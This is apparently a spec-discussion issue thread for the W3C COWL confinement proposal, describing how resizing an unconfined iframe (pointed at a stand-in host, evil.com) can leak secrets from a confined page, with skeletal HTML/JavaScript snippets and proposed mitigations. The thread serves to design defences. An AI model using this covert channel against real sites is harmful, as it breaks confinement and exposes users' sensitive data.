iFrame resizing as covert channel

[NAndreasson]

Ties into issue #33

By creating an unconfined child context, before becoming confined, it is possible to leak secrets to it.

Leaking Information

<iframe id="unconfined" src="http://evil.com/"><iframe>                                                                                                         
<script>                                                                                                                                                                       
  var unconfinedFrame = document.getElementById('unconfined');                                                                                                                 
  if (secret == ...) {                                                                                                                                                       
    unconfinedFrame.style.width = ...;                                                                                                                                       
  } else {                                                                                                                                                                   
    unconfinedFrame.style.width = ...;                                                                                                                                       
 }                                                                                                                                                                                                                                                                                          </script>  

Also there is a more "subtle" case where you indirectly changes the size of the unconfined context.

<div id="conductor" style="width:600px;">
<iframe style="width:50%" src="http://evil.com"></iframe>
</div>
<script>
  var conductor = document.getElementById('conductor');                                                                                                                 
  if (secret == ...) {                                                                                                                                                       
    conductor.style.width = ...;                                                                                                                                       
  } else {                                                                                                                                                                   
    conductor.style.width = ...;                                                                                                                                       
 }                                                      
</script>

Retrieving Information

From the unconfined frame it is possible to retrieve information via the width/height properties.

<script>
  var width = window.innerWidth;
 // compute secret
</script>

[deian]

We discussed this on April 13 on https://gitter.im/w3c/webappsec-cowl

The short summary is that if a context has untainted children frames and then taints itself, it can leak data by re-sizing the iframe.

• If we can disallow re-sizing, directly or indirectly, then the problem goes away: you can't re-size an iframe if the label of the frame is not more restricting. This is a bit tricky.
• If we don't disallow re-sizing, then are we okay with leaks via this channel? Down the line: no. But maybe we can add principals sensitive:... to denote that data is very sensitive and should not be leaked via covert channels. This amounts to adding some more restrictions (e.g., you can't get tainted with this principal if you have untainted children).